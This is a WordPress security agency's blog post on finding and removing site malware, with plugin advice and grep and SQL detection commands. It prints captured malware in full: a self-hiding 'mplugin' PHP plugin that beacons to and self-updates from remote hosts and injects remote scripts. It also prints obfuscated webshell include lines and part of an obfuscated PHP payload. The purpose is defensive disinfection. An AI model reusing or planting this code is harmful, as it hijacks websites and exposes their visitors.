{"id":4308,"date":"2021-05-31T09:30:27","date_gmt":"2021-05-31T09:30:27","guid":{"rendered":"https:\/\/acinonyxweb.agency\/?p=4308"},"modified":"2021-12-29T16:47:25","modified_gmt":"2021-12-29T16:47:25","slug":"votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress","status":"publish","type":"post","link":"https:\/\/acinonyxweb.agency\/fr\/cybersecurite\/votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress\/","title":{"rendered":"Your site is probably infected without your knowing it. How to detect and clean viruses from a WordPress site?"},"content":{"rendered":"
WordPress being the most popular CMS in the world has made it a prime target for hackers. It has therefore become routine that, during ordinary interventions for clients, we come across numerous well-hidden backdoors that the administrator knew nothing about: the attackers' goal is to stay as discreet as possible.<\/p>\n


Today, sites are not necessarily defaced, made to display advertising (spamware) or used to generate posts and links to strange sites… These sites are exploited by attackers as discreetly as possible so as not to be detected and removed; this is what is known as an advanced persistent threat.<\/p>\n


Indeed, in most cases the affected sites are those that are no longer updated. WordPress regularly offers core updates to patch critical vulnerabilities throughout the year, and the same goes for plugins. If you do not update them and one of these outdated plugins contains a vulnerability, it will take a hacker only 5 minutes to find it, notably thanks to sites such as WP Sec.<\/p>\n

A more critical weakness is shared hosting: a site that is not yours infects the server, which in turn infects you. In this way Siteground users were, one after another, victims of infections of their sites.<\/p>\n

That is why we recommend our dedicated hosting (a single server for you alone).<\/p>\n


If you are reading this article today, it is quite likely that you have already faced this situation and are looking for ways to diagnose and then disinfect your site. Look no further: this article summarises the main actions to take to clean your WordPress site of any backdoors, shells, malware and viruses.<\/p>\n


Scan your WordPress site using plugins<\/h2>\n

The first and simplest thing on our list is to install a plugin directly on your WordPress. There are several security plugins for WordPress, but few offer complete scans from the back office.<\/p>\n


The free plugin of interest in this case is:<\/p>\n

Wordfence Security \u2013 Firewall & Malware Scan<\/p>\n

[Image: Wordfence]<\/p>\n

With this plugin, in two clicks you can launch a scan of the server, of modified files and of the most common malware that the plugin can detect… In short, a complete check-up of your site. This is the first thing to do if you suspect a compromise.<\/p>\n

Be careful, though: the plugin may sometimes flag certain files as malicious because they contain base64-encoded code, which is not always malicious. So always remember to back up your files, or call on an expert.<\/p>\n


WARNING: most WordPress viruses are designed not to be detected by these WordPress anti-malware plugins<\/p>\n


Look for and delete unknown administrator accounts, as well as posts and pages you did not create<\/h2>\n


Block XML-RPC and the REST API if you do not use them<\/h2>\n

Never heard of these features? Then there is a good chance you do not need them. They allow malware to execute code remotely and to regenerate itself, so it is better to block them preventively.<\/p>\n


All of this can be done in a few clicks with:<\/p>\n

iThemes Security (formerly Better WP Security)<\/p>\n

[Image: configuration]<\/p>\n

After running the site's automatic hardening, we advise you to enrol your site in the anti-brute-force network. Even if your site is already compromised, this has the advantage of blocking the IP address of the attacker and of their remote control server (C&C, botnet…).<\/p>\n


In the options, go to the WordPress feature settings:<\/p>\n
[Image: itheme]<\/p>\n
Then tick and select the following options (all the recommended ones, in fact):<\/p>\n

[Image: wordpress]<\/p>\n


You will thus limit the risk of reinfection: in general, when your WordPress is infected by malware, even if you remove it, it is automatically re-injected by a remote server that constantly monitors the level of infection of your site through the features we have just disabled.<\/p>\n

By blocking them, the virus will no longer be re-injected!<\/p>\n


Scan the tables of the WordPress database<\/h2>\n

Within a WordPress site it is possible to inject PHP and JavaScript code directly from a database table. Many plugins exist for this, but it is not these plugins that interest us here: only the method used to execute malicious code.<\/p>\n

Some relatively clever malware stores a <script> tag directly in the wp_options table. So remember to run an SQL query of this type to make sure you are not affected:<\/p>\n

SELECT * FROM `wp_options` WHERE (CONVERT(`option_name` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`option_value` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`autoload` USING utf8mb4) LIKE '%ad_code%') LIMIT 50<\/pre>\n

Manually, simply go into your WordPress database, then into the options table (wp_options by default, but your prefix may differ) and search it for<\/p>\n

<script\r\n<\/pre>\n

or for<\/p>\n

<?php\r\n<\/pre>\n

Example of viral code found at one of our clients:<\/p>\n

[Image: code]<\/p>\n

'ad_code', '\\n<script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\\'><\/script>\\n<script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\\'><\/script>\\n', 'yes'<\/pre>\n

Here the site will automatically execute the remote files:<\/p>\n

aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\r\naanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\r\n<\/pre>\n

which are obfuscated WordPress virus injectors (you do not need to be a computer-virology engineer to understand that obfuscated, remotely executed code on a WordPress site is very likely to be harmful).<\/p>\n


Once again, be careful about what you find and delete, as it can sometimes be results coming from simple advertising plugins that load Google Ads (for example), or code injected by legitimate plugins such as Code Snippets.<\/p>\n


If in doubt, we recommend turning to Acinonyx Web Agency: our experienced staff will be able to tell malware apart from a conventional obfuscated function.<\/p>\n


Analyse file changes on the server side<\/h2>\n

For this step, you will need to connect over SSH in order to run commands and analyse their output. For each command, remember to replace \"\/var\/www\/wordpress\/\" with the path of your site.<\/p>\n

Over FTP, it is pointless to rely on file modification dates, since they can easily be forged. The file permissions (chmod), on the other hand, can be a good indicator…<\/p>\n


As usual, be careful before deleting files or pieces of code that may not be infected (false positives).<\/p>\n


Look for mplugin.php in your WordPress plugins folder<\/h2>\n

As the most common infection, it deserves a section of its own. Many clients download nulled or cracked themes or plugins. Except that nothing is free, and you pay the price later: your site displays advertising to pay the hacker:<\/p>\n


Here it is mplugins.php (even with an extra \"s\", the malware is the same).<\/p>\n

You will never see anything, because the plugin hides itself in the plugin list, records the admins' IP addresses and hides the advertising from them; it is only shown to third-party visitors:<\/p>\n

<?php\r\n\/**\r\n * Plugin Name: Monetization Code plugin\r\n * Description: mplugin Shows cusom codes to display your ad codes.\r\n * Author: aerin Singh\r\n * Version: 1.0\r\n *\/\r\nerror_reporting(0);\r\nini_set('display_errors', 0);\r\n$plugin_key='4ab94009633ce74d72c165d5b5577957';\r\n$version='1.2';\r\n\r\nadd_action('admin_menu', function() {\r\n    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );\r\n    remove_submenu_page( 'options-general.php', 'mplugin' );\r\n});\r\n\r\n\r\n\r\nadd_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');\r\nfunction salcode_add_plugin_page_settings_mplugin( $links ) {\r\n    $links[] = '<a href=\"' .\r\n        admin_url( 'options-general.php?page=mplugin' ) .\r\n        '\">' . __('Settings') . '<\/a>';\r\n    return $links;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\nadd_action( 'admin_init', function() {\r\n\r\n    register_setting( 'mplugin-settings', 'default_mont_options' );\r\n    register_setting( 'mplugin-settings', 'ad_code' );\r\n    register_setting( 'mplugin-settings', 'hide_admin' );\r\n    register_setting( 'mplugin-settings', 'hide_logged_in' );\r\n    register_setting( 'mplugin-settings', 'display_ad' );\r\n    register_setting( 'mplugin-settings', 'search_engines' );\r\n    register_setting( 'mplugin-settings', 'auto_update' );\r\n    register_setting( 'mplugin-settings', 'ip_admin');\r\n    register_setting( 'mplugin-settings', 'cookies_admin' );\r\n    register_setting( 'mplugin-settings', 'logged_admin' );\r\n    register_setting( 'mplugin-settings', 'log_install' );\r\n    \r\n});\r\n\r\n$ad_code=\"\r\n<script type='text\/javascript' src='\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js'><\/script>\r\n<script type='text\/javascript' 
src='\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js'><\/script>\r\n\";\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\nfunction mplugin_page() {\r\n ?>\r\n   <div class=\"wrap\">\r\n<form action=\"options.php\" method=\"post\">\r\n       <?php\r\n       settings_fields( 'mplugin-settings' );\r\n       do_settings_sections( 'mplugin-settings' );\r\n$ad_code='';\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\n       ?>\r\n       <h2>mplugin Plugin<\/h2>\r\n       <table>\r\n             \r\n <tr>\r\n                <th>Ad Code<\/th>\r\n                <td><textarea placeholder=\"\" name=\"ad_code\" rows=\"5\" cols=\"130\"><?php echo get_option('ad_code',$ad_code) ; ?><\/textarea><\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n<tr>\r\n                <th>Hide ads to :<\/th>\r\n                <td>\r\n                    <input type=\"hidden\" id=\"default_mont_options\" name=\"default_mont_options\" value=\"on\">\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"hide_admin\" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>admins\r\n                    <\/label>\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"hide_logged_in\" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 
'checked=\"checked\"' : ''; ?> \/>logged in users\r\n                    <\/label>\r\n                    <br\/>\r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n            <tr>\r\n                <th>Recognize admin by :<\/th>\r\n                <td>\r\n\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"logged_admin\" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>logged in\r\n                    <\/label>\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"ip_admin\" id=\"ip_admin\"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked=\"checked\"' : '' ?> \/>By IP addresses\r\n                    <\/label>\r\n                                        <label>\r\n                        <input type=\"checkbox\" name=\"cookies_admin\" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>By Cookies\r\n                    <\/label>\r\n                \r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n            <tr>\r\n                <th>Display ads to :<\/th>\r\n                <td>\r\n                 \t\t\t\t         <select name=\"display_ad\">\r\n                        \r\n                        <option value=\"organic\" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected=\"selected\"' : ''; ?>>Organic traffic only<\/option>\r\n                        <option value=\"all_visitors\" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 
'selected=\"selected\"' : ''; ?>>All Visitors<\/option>\r\n                        \r\n                    <\/select>\r\n\r\n                <\/td>\r\n            <\/tr>\r\n\r\n            <tr>\r\n                <th>Search Engines<\/th>\r\n                <td><input type=\"text\" placeholder=\"Internal title\" name=\"search_engines\" value=\"<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>\" size=\"80\" \/><p class=\"description\">\r\n            comma separated  <\/p>\r\n                <\/td>\r\n            <\/tr>\r\n \r\n \r\n <tr>\r\n                <th>Auto Update :<\/th>\r\n                <td>\r\n\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"auto_update\" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>auto update plugin\r\n                    <\/label><br\/>\r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n \r\n            <tr>\r\n                <td><?php submit_button(); ?><\/td>\r\n            <\/tr>\r\n \r\n        <\/table>\r\n       \r\n       \r\n       \r\n     <\/form>\r\n   <\/div>\r\n <?php\r\n}\r\n\r\n\/*************************log install***************************\/\r\nif(get_option('log_install') !=='1')\r\n{\r\n    if(!$log_installed = @file_get_contents(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]))\r\n{\r\n    $log_installed = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]);\r\n}\r\n}\r\n\/*************************set default options***************************\/\r\n\r\nif(get_option('default_mont_options') !=='on')\r\n{\r\nupdate_option('ip_admin', $ip_admin);\r\nupdate_option('ad_code', $ad_code);\r\nupdate_option('cookies_admin', $cookies_admin);\r\nupdate_option('logged_admin', $logged_admin);\r\nupdate_option('hide_admin', $hide_admin);\r\nupdate_option('hide_logged_in', $hide_logged_in);\r\nupdate_option('display_ad', 
$display_ad);\r\nupdate_option('search_engines', $search_engines);\r\nupdate_option('auto_update', $auto_update);\r\nupdate_option('log_install', '1');\r\n}\r\n\r\n\/************************************************************************\/\r\ninclude_once(ABSPATH . 'wp-includes\/pluggable.php'); \r\n\r\nif ( ! function_exists( 'display_ad_single' ) ) {  \r\n\r\nfunction display_ad_single($content){ \r\nif(is_single())\r\n{\r\n\r\n$content=$content.get_option('ad_code');;\r\n}\r\nreturn $content;\r\n} \r\n\r\nfunction display_ad_footer(){ \r\nif(!is_single())\r\n{\r\necho get_option('ad_code');\r\n}\r\n} \r\n\r\n\r\n\/\/setting cookies if admin logged in\r\nfunction setting_admin_cookie() {\r\n  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);\r\n  }\r\n\r\nif(get_option('cookies_admin')=='on')\r\n{\r\n\r\nif(is_user_logged_in())\r\n{\r\nadd_action( 'init', 'setting_admin_cookie',1 );\r\n}\r\n}\r\n\r\n\r\n\/\/log admin IP addresses\r\n$vis_ip=getVisIpAddr_mplugin();\r\nif(get_option('ip_admin')=='on')\r\n{\r\nif(current_user_can('edit_others_pages'))\r\n{\r\n\r\nif (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))\r\n{\r\n$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\n}\r\n\r\nif (stripos($ip, $vis_ip) === false)\r\n{\r\n$ip.=$vis_ip.'\r\n';\r\n@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);\r\n\r\n}\r\n\r\n}\r\n}\/\/ end if log admins ip\r\n\r\n\r\n\r\n\r\n\/\/add cookies to organic traffic\r\n\r\nif(get_option('display_ad')=='organic')\r\n{\r\n\r\n$search_engines = explode(',', get_option('search_engines'));\r\n\r\n$referer = $_SERVER['HTTP_REFERER'];\r\n$SE = array('google.','\/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');\r\nforeach ($search_engines as $search) {\r\n  if (strpos($referer,$search)!==false) {\r\n    setcookie(\"organic\", 1, time()+120, COOKIEPATH, 
COOKIE_DOMAIN); \r\n    $organic=true;\r\n  }\r\n}\r\n\r\n}\/\/end\r\n\r\n\r\n\r\n\r\n\/\/display ad\r\n\r\nif(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) \r\n{\r\n\r\n$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\nif (stripos($ips, $vis_ip) === false)\r\n{\r\n\/*****\/\r\nif(get_option('display_ad')=='organic')\r\n{\r\nif($organic==true || isset($_COOKIE['organic']))\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer'); \r\n}\r\n}\r\nelse\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer');  \r\n}\r\n\r\n\/****\/\r\n\r\n}\r\n\r\n}\r\n\/*******************\/\r\n\r\n\r\n\r\n\r\n\r\n\/\/update plugin\r\n\r\nif(get_option('auto_update')=='on')\r\n{\r\n\r\nif( ini_get('allow_url_fopen') ) {\r\n\r\n\r\n\r\n        if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== 
false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n}\r\nelse\r\n{\r\n            if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n}\r\n}\/\/end if auto update\r\n\r\n\/*********************************\/\r\n\r\n\r\n\r\n}\/\/ if function exist\r\n\r\n\r\n\r\n     function file_get_contents_mplugin($url)\r\n        {\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);\r\n            curl_setopt($ch, CURLOPT_HEADER, 0);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);\r\n            $data = curl_exec($ch);\r\n            
curl_close($ch);\r\n            return $data;\r\n        }\r\n\r\n\r\nfunction hide_plugin_mplugin() {\r\n  global $wp_list_table;\r\n  $hidearr = array('mplugin.php');\r\n  $myplugins = $wp_list_table->items;\r\n  foreach ($myplugins as $key => $val) {\r\n    if (in_array($key,$hidearr)) {\r\n      unset($wp_list_table->items[$key]);\r\n    }\r\n  }\r\n}\r\n\r\nadd_action('pre_current_active_plugins', 'hide_plugin_mplugin');\r\n\r\n        function getVisIpAddr_mplugin() { \r\n      \r\n    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { \r\n        return $_SERVER['HTTP_CLIENT_IP']; \r\n    } \r\n    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { \r\n        return $_SERVER['HTTP_X_FORWARDED_FOR']; \r\n    } \r\n    else { \r\n        return $_SERVER['REMOTE_ADDR']; \r\n    } \r\n}\r\n\r\n?><\/pre>\n

The m stands for moneyplugin, or how to monetise your victims.<\/p>\n


Here the culprit was UpdraftPlus, which was found with this SSH command:<\/p>\n

grep -r -i --include=\\*.php 'mplugin.php' \/var\/www\/\r\n<\/pre>\n

Translation: who generated mplugin? Own up!<\/p>\n

In general it also infects the file \/wp-includes\/functions.php, which you will also need to disinfect.<\/p>\n


We can only advise you to remove the cracked\/nulled plugins responsible, even though removing the infected part is enough. Not only is it illegal, but pirated plugins are always infected to some degree, one way or another.<\/p>\n


Remember: if it is free, you are the product<\/p>\n


Analyse the native WordPress core files<\/h3>\n


First thing to do: check whether the native WordPress files have been modified. This is the simplest step; all you need to do is run the following commands:<\/p>\n

nano \/var\/www\/wordpress\/index.php\r\nnano \/var\/www\/wordpress\/wp-config.php\r\nnano \/var\/www\/wordpress\/wp-settings.php\r\n<\/pre>\n

Then check whether these files contain, at the top or at the bottom, obfuscated code or an \"@include\". This may be either a string of unintelligible letters and words, or base64-encoded code.<\/p>\n

If so: delete them.<\/p>\n


You can also use this command to list the .php files containing an \"@include\":<\/p>\n

grep -r -i --include=\\*.php '*\/ @include' \/var\/www\/<\/pre>\n


Example of infected code:<\/p>\n

@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";<\/pre>\n

It is this type of malware: a webshell obfuscated as a .ico file and injected by a dropper (you must have downloaded a plugin from an unofficial source).<\/p>\n


Once decoded on https:\/\/www.unphp.net, we see that there are multiple shellcodes in .ico files that you will need to delete:<\/p>\n

@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";<\/pre>\n

Delete them, then use the following command to detect whether other infected .ico files exist:<\/p>\n

grep -r -i --include=\\*.ico 'preg_replace' \/var\/www\/<\/pre>\n

In general this is not enough: the core of the malware must be eliminated to stop any regeneration. To find it, here are a few steps to follow:<\/p>\n


Look for files containing obfuscated and\/or base64 code<\/h3>\n
grep -Er '[A-Za-z0-9+\/]{4}*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)' \/var\/www\/wordpress\/*\r\ngrep -Erl '[[:alnum:]\/+]{20,}' \/var\/www\/wordpress\/*\r\ngrep -rl 'base64_encode' \/var\/www\/wordpress\/*\r\n<\/pre>\n

These commands will list all files containing suspicious code. All that remains is to analyse them one by one.<\/p>\n

Here are a few examples of obfuscated malware:<\/p>\n

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $a2b51c7d0 = 290;$GLOBALS['kf0800b21'] = Array();global $kf0800b21;$kf0800b21 = $GLOBALS;${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}['e7ad307'] = \"\\x27\\x75\\x34\\x20\\x79\\x7e\\x7a\\x7b\\x43\\x21\\x38\\x4e\\x51\\x47\\x63\\x29\\x55\\x59\\x42\\x5b\\x77\\x61\\x62\\x4c\\x23\\x53\\x71\\x68\\x22\\x5d\\x3f\\x58\\x2c\\x72\\x6f\\x24\\x6b\\x3e\\xd\\x35\\x78\\x37\\x5e\\x32\\x57\\x54\\x6c\\x73\\x76\\x66\\x65\\x69\\x4d\\x5a\\x9\\x33\\x3c\\xa\\x36\\x5c\\x67\\x60\\x50\\x7c\\x64\\x6e\\x3a\\x40\\x46\\x4a\\x7d\\x2e\\x2f\\x25\\x45\\x39\\x70\\x31\\x5f\\x3b\\x49\\x30\\x26\\x3d\\x52\\x48\\x2a\\x6a\\x6d\\x44\\x4b\\x56\\x2d\\x28\\x4f\\x2b\\x41\\x74\";$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][33];$kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][64];$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]] = 
$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]] = $kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]] = 
